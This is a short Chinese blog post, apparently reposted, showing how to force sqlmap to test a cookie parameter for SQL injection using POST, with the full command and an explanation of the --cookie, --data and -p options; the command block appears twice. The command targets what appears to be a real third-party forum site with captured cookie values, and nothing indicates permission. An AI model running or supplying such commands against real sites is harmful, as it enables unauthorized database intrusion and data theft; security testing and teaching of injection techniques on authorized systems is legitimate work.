sqlmap使用post方法对cookie进行注入
2014-03-27 09:54
106 查看
sqlmap默认使用get方法,并且只有在注入level>=2的时候才会对cookie进行注入,要想使用post方法,但是如果post的参数为0,可以指定 --data 为空,下面以cookie名为CNZZDATA3834609为例进行注入:
sqlmap -u http://www.beihai.ccoo.cn/forum/GetUserInfo.Asp?id=0 --cookie="CNZZDATA3568186=cnzz_eid%3D1227930120-1395711655-%26ntime%3D1395799625%26cnzz_a%3D1%26sin%3Dnone%26ltime%3D1395799604656%26rtime%3D1; CNZZDATA3834609=cnzz_eid%3D144071239-1395711655-%26ntime%3D1395799624%26cnzz_a" -p
”CNZZDATA3834609“ --data "" --level 2
下面再分别说明几个选项的作用:
--cookie="CNZZDATA3568186=cnzz_eid%3D1227930120-1395711655-%26ntime%3D1395799625%26cnzz_a%3D1%26sin%3Dnone%26ltime%3D1395799604656%26rtime%3D1; CNZZDATA3834609=cnzz_eid%3D144071239-1395711655-%26ntime%3D1395799624%26cnzz_a" 当需要对cookie注入的时候,必须使用--cookie选项
--data "" 因为post的数据长度为0,但是又想使用post方法进行注入,则使用--data "" ,使用--data选项后,sqlmap自动使用post方法,sqlmap不支持使用--method指定http请求方法
-p ”CNZZDATA3834609“ 指定对名为”CNZZDATA3834609的cookie进行注入
sqlmap -u http://www.beihai.ccoo.cn/forum/GetUserInfo.Asp?id=0 --cookie="CNZZDATA3568186=cnzz_eid%3D1227930120-1395711655-%26ntime%3D1395799625%26cnzz_a%3D1%26sin%3Dnone%26ltime%3D1395799604656%26rtime%3D1; CNZZDATA3834609=cnzz_eid%3D144071239-1395711655-%26ntime%3D1395799624%26cnzz_a" -p
”CNZZDATA3834609“ --data "" --level 2
下面再分别说明几个选项的作用:
--cookie="CNZZDATA3568186=cnzz_eid%3D1227930120-1395711655-%26ntime%3D1395799625%26cnzz_a%3D1%26sin%3Dnone%26ltime%3D1395799604656%26rtime%3D1; CNZZDATA3834609=cnzz_eid%3D144071239-1395711655-%26ntime%3D1395799624%26cnzz_a" 当需要对cookie注入的时候,必须使用--cookie选项
--data "" 因为post的数据长度为0,但是又想使用post方法进行注入,则使用--data "" ,使用--data选项后,sqlmap自动使用post方法,sqlmap不支持使用--method指定http请求方法
-p ”CNZZDATA3834609“ 指定对名为”CNZZDATA3834609的cookie进行注入
相关文章推荐
- (转载)使用sqlmap 绕过防火墙进行注入测试
- 使用sqlmap 绕过防火墙进行注入测试
- burp结合sqlmap进行后台登录框post注入
- 使用Post进行页面传值的方法
- SQLMAP注入教程-11种常见SQLMAP使用方法详解
- SPRING.NET 1.3.2 学习23--使用方法的返回值进行注入
- 使用HttpClient进行http post/get方法的调用,以及使用dom4j解析xml
- 使用sqlmap 绕过防火墙进行注入测试
- Android 使用Post与Get方法进行表单提交数据
- 使用方法的返回值进行注入
- 【转】介绍vb使用xmlhttp对象、webbrowser控件、inet控件进行Post发包、Get发包的方法
- jQuery的ajax()检验用户名;通过jQuery的load()/get()/post()方法实现;使用XMLHTTPRequest对象来进行AJAX的异步数据交互
- 如果在一个B/S结构的系统中需要传递变量值,但是又不能使用Session、Cookie、Application,您有几种方法进行处理?
- 使用Mono Cecil 动态获取运行时数据 (Atribute形式 进行注入 用于写Log) [此文报考 xxx is declared in another module and needs to be imported的解决方法]-摘自网络
- sqlmap注入使用方法
- nodejs 使用http进行post或get请求(携带cookie)
- 使用HttpClient进行http post/get方法的调用,以及使用dom4j解析xml
- cookie中转注入,使用sqlmap中转注入
- 使用sqlmap 绕过防火墙进行注入测试
- python爬虫get和post方法的使用以及cookie